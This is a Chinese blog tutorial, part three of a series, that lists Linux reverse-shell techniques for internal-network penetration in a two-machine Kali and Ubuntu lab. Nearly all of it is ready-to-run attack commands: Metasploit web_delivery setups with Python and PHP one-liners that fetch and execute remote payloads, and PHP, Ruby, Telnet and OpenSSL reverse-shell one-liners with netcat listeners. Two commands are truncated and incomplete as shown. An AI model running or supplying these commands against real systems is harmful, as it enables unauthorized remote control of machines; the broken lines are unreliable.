码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 内网渗透之Linux反弹shell(三)


    目录

    Linux反弹shell(三)

    环境

    05.3Python

    06.1PHP

    06.2PHP

    07Ruby

    08.1Telnet

    08.2Telnet

    09OpenSSL


    Linux反弹shell(三)

    环境

    kali                        192.168.0.100

    ubuntu                   192.168.0.104

    05.3Python

    通过Web delivery反弹shell:

    use exploit/multi/script/web_delivery

    set target 0

    set payload python/meterpreter/reverse_tcp

    set lhost 192.168.0.100

    set lport 6674

    exploit –j

    python3 -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.0.100:8080/37ywCheomL', context=ssl._create_unverified_context());exec(r.read());"

    注意:python报错的话可以参考此链接:

    https://dsalearning.github.io/linux/linux-xrdp-install/

    反弹shell

    06.1PHP

    nc -lvvp 6675

    php -r '$sock=fsockopen("192.168.0.100",6675);exec("/bin/sh -i <&3 >&3 2>&3");'

    反弹shell

    06.2PHP

    通过web_delivery反弹shell:

    use exploit/multi/script/web_delivery

    set target 1

    set payload php/meterpreter/reverse_tcp

    set lhost 192.168.0.100

    set lport 6676

    exploit –j

    php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.0.100:8080/5APzkJZHvxfB', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

    反弹shell

    07Ruby

    查看攻击模板

    msfvenom -l payload | grep "ruby" | awk '{print($1)}'

    nc -lvvp 6677

    ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.100","6677");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

    08.1Telnet

    nc -lvvp 6678

    nc -lvvp 6679

    telnet 192.168.0.100 6678 | /bin/bash | telnet 192.168.0.100 6679 

    监听6678端口执行命令,结果会在6679端口输出

    08.2Telnet

    nc -lvvp 6680

    rm -f a && mknod a p && telnet 192.168.0.100 6680 0a

    反弹shell

    09OpenSSL

    1. 在远程攻击主机上生成秘钥文件

    openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 - nodes

    2. 在远程攻击主机上启动监视器

    openssl s_server -quiet -key key.pem -cert cert.pem -port 443

    3. 在目标机上反弹shell

    mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect

    : > /tmp/s; rm /tmp/s

  • 相关阅读:
    数分面试题2-牛客
    点的数量对迭代次数的影响
    基于SSM实现智慧幼儿园信息管理系统
    三.镜头知识之FOV
    【机器学习算法】序列模式的概念,Aprioriall算法和SrefixSpan算法
    生成二维码。且可调颜色
    李峋同款会动的爱心Python代码版
    高通SDX12:ASoC 音频框架浅析
    centos7安装node教程
    java毕业设计财务管理系统的设计与实现Mybatis+系统+数据库+调试部署
  • 原文地址:https://blog.csdn.net/lyshark_lyshark/article/details/126799179
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号